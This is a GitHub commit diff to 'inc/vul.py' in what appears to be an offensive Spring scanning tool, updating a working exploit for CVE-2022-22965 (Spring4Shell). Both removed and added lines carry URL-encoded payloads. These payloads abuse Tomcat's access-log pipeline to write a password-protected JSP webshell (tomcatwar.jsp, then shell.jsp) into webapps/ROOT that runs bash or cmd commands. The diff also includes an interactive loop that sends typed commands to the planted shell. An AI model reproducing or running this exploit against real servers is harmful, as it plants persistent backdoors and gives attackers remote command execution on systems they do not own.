Skip to content

Commit

Permalink
Update vul.py
Browse files Browse the repository at this point in the history
  • Loading branch information
@AabyssZG
AabyssZG authored Dec 28, 2023
1 parent ef391b3 commit 29f4e20
Showing 1 changed file with 24 additions and 14 deletions.
38 changes: 24 additions & 14 deletions inc/vul.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -22,40 +22,50 @@ def CVE_2022_22965(url, proxies):
cprint("======开始对目标URL进行CVE-2022-22965漏洞利用======", "green")
Headers_1 = {
"User-Agent": random.choice(ua),
"prefix": "<%",
"suffix": "%>//",
"c": "Runtime",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
}
Headers_2 = {
"User-Agent": random.choice(ua),
"Content-Type": "application/x-www-form-urlencoded"
}
payload_linux = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_win = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_http = """?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
data1 = payload_linux
data2 = payload_win
}
payload_linux = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_win = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_http = """?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_other = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_"
getpayload = url + payload_http
try:
requests.packages.urllib3.disable_warnings()
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
requests.post(url, headers=Headers_2, data=file_date_data, verify=False)
requests.post(url, headers=Headers_2, data=payload_other, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
requests.post(url, headers=Headers_1, data=payload_linux, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
sleep(0.5)
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
requests.post(url, headers=Headers_1, data=payload_win, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
sleep(0.5)
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
sleep(0.5)
test = requests.get(url + "tomcatwar.jsp", verify=False, proxies=proxies)
if (test.status_code == 200) and ('aabysszg' in str(test.text)):
cprint("[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami" ,"red")
requests.get(url, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
test = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
test_again = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
if (test.status_code == 500) or (test_again.status_code == 200):
cprint("[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "shell.jsp?pwd=aabysszg&cmd=whoami" ,"red")
while 1:
Cmd = input("[+] 请输入要执行的命令>>> ")
if Cmd == "exit":
sys.exit(0)
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(Cmd)
url_shell = url + "shell.jsp?pwd=aabysszg&cmd={}".format(Cmd)
r = requests.get(url_shell, verify=False, proxies=proxies)
resp = r.text
r_again = requests.get(url_shell, verify=False, proxies=proxies)
resp = r_again.text
result = re.findall('([^\x00]+)\n', resp)[0]
cprint(result ,"green")
else:
cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/tomcatwar.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/shell.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
except KeyboardInterrupt:
print("Ctrl + C 手动终止了进程")
sys.exit()
Expand Down

0 comments on commit 29f4e20

Please sign in to comment.